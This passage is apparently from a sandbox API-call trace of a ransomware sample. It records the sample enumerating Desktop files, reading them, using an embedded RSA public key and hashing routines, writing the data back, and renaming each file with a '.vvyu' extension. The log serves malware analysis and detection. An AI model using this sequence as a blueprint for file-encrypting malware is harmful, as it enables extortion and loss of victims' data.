RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7e0 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e7c8 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.762] GetCurrentThreadId () returned 0x264 [0183.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce650 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.763] GetCurrentThreadId () returned 0x264 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7e0 [0183.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e840 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e858 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7f8 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7c8 [0183.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30f88 | out: hHeap=0x6a0000) returned 1 [0183.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.775] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xccc5, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xccc5, lpOverlapped=0x0) returned 1 [0183.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.776] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xccca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.777] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.778] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.778] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.778] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.779] CloseHandle (hObject=0x584) returned 1 [0183.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0183.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.780] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\FMtIy2J60xYs_lff.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\fmtiy2j60xys_lff.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\FMtIy2J60xYs_lff.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\fmtiy2j60xys_lff.png.vvyu")) returned 1 [0183.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.783] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.786] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed3bd90, ftCreationTime.dwHighDateTime=0x1d8a6c7, ftLastAccessTime.dwLowDateTime=0xd70855d0, ftLastAccessTime.dwHighDateTime=0x1d8a6ec, ftLastWriteTime.dwLowDateTime=0xd70855d0, ftLastWriteTime.dwHighDateTime=0x1d8a6ec, nFileSizeHigh=0x0, nFileSizeLow=0x11b5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gnNW5oKgmW5QeElwN.mp4", cAlternateFileName="GNNW5O~1.MP4")) returned 1 [0183.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30f88 [0183.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0183.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30f88 | out: hHeap=0x6a0000) returned 1 [0183.787] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\gnNW5oKgmW5QeElwN.mp4") returned=".mp4" [0183.787] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\gnNW5oKgmW5QeElwN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\gnnw5okgmw5qeelwn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.787] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=72542) returned 1 [0183.787] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.790] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11b38, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.790] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.791] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.791] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x11b5e, lpOverlapped=0x0) returned 1 [0183.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.792] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.793] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.793] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.793] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.793] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.793] GetLastError () returned 0x0 [0183.793] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.793] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.794] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.794] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.794] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11b60) returned 0x2d43778 [0183.795] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 